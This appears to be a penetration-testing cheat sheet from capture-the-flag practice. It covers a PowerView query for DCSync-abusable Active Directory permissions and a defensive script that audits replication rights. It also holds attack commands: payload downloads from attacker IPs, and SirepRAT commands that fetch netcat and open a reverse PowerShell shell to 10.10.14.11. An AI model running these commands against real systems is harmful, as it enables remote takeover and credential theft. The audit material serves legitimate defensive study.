PowerShell
1. Active Directory
1.1 Misconfigured Object Permissions
Import the PowerView module, which lets you check for misconfigured object permissions that can be abused to dump DC password hashes using the DCSync technique. If you are unfamiliar with the technique, you can read about it here: http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/.
Get-ObjectAcl -DistinguishedName "dc=EGOTISTICAL-BANK,dc=LOCAL" -ResolveGUIDs | ? {$_.IdentityReference -match "svc_loanmgr|Fsmith"}
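As an added defender's counterpart (not part of the original page), the same check with the built-in RSAT ActiveDirectory module: list every ACE on the domain object that grants a replication control-access right (the rights DCSync depends on) and flag identities outside a baseline of expected holders. The baseline list and the function name are assumptions to adjust for your environment; the replication right GUIDs are the well-known schema values.

```powershell
# Added example: audit which principals hold DCSync-capable rights on the domain object.
# Requires the RSAT ActiveDirectory module, which provides the AD: PSDrive used by Get-Acl.
Import-Module ActiveDirectory

# Well-known control-access right GUIDs for directory replication.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Principals expected to hold replication rights (assumption; extend with e.g. an
# Azure AD Connect service account if your environment legitimately uses one).
$Baseline = @(
    'BUILTIN\Administrators',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'NT AUTHORITY\ENTERPRISE READ-ONLY DOMAIN CONTROLLERS',
    "$((Get-ADDomain).NetBIOSName)\Domain Controllers"
)

function Get-DcSyncRightHolders {
    # Hypothetical helper name; pass e.g. "DC=EGOTISTICAL-BANK,DC=LOCAL" to target a specific domain.
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)

    $acl = Get-Acl -Path "AD:\$DomainDN"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }

        $guid = $ace.ObjectType.ToString()
        $isExtended = [bool]($ace.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)
        $isGenericAll = [bool]($ace.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::GenericAll)

        # A replication extended right, or GenericAll (which implies every extended right), qualifies.
        if (($isExtended -and $ReplicationRights.ContainsKey($guid)) -or $isGenericAll) {
            [pscustomobject]@{
                Identity   = $ace.IdentityReference.Value
                Right      = if ($isGenericAll) { 'GenericAll (implies all extended rights)' } else { $ReplicationRights[$guid] }
                Inherited  = $ace.IsInherited
                InBaseline = $Baseline -contains $ace.IdentityReference.Value
            }
        }
    }
}

# Anything listed here is a principal that can replicate secrets and is not in your baseline.
Get-DcSyncRightHolders | Where-Object { -not $_.InBaseline } | Format-Table -AutoSize
```

WriteDacl or WriteOwner on the domain object lets a principal grant these rights to itself, so include those in a full review even though this script only reports the replication rights directly.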

2. Miscellaneous Commands
2.1 Download Files
Invoke-WebRequest http://10.10.15.188:8000/PowerUp.ps1 -OutFile C:\Temp\PowerUp.ps1
// Download File
python SirepRAT.py X.X.X.X LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell.exe -command Invoke-WebRequest -Uri http://10.10.14.11:8000/nc64.exe -Outfile C:\tests\nc64.exe"
// Execute File To Connect Back
python SirepRAT.py X.X.X.X LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell.exe -command C:\tests\nc64.exe 10.10.14.11 4444 -e powershell.exe"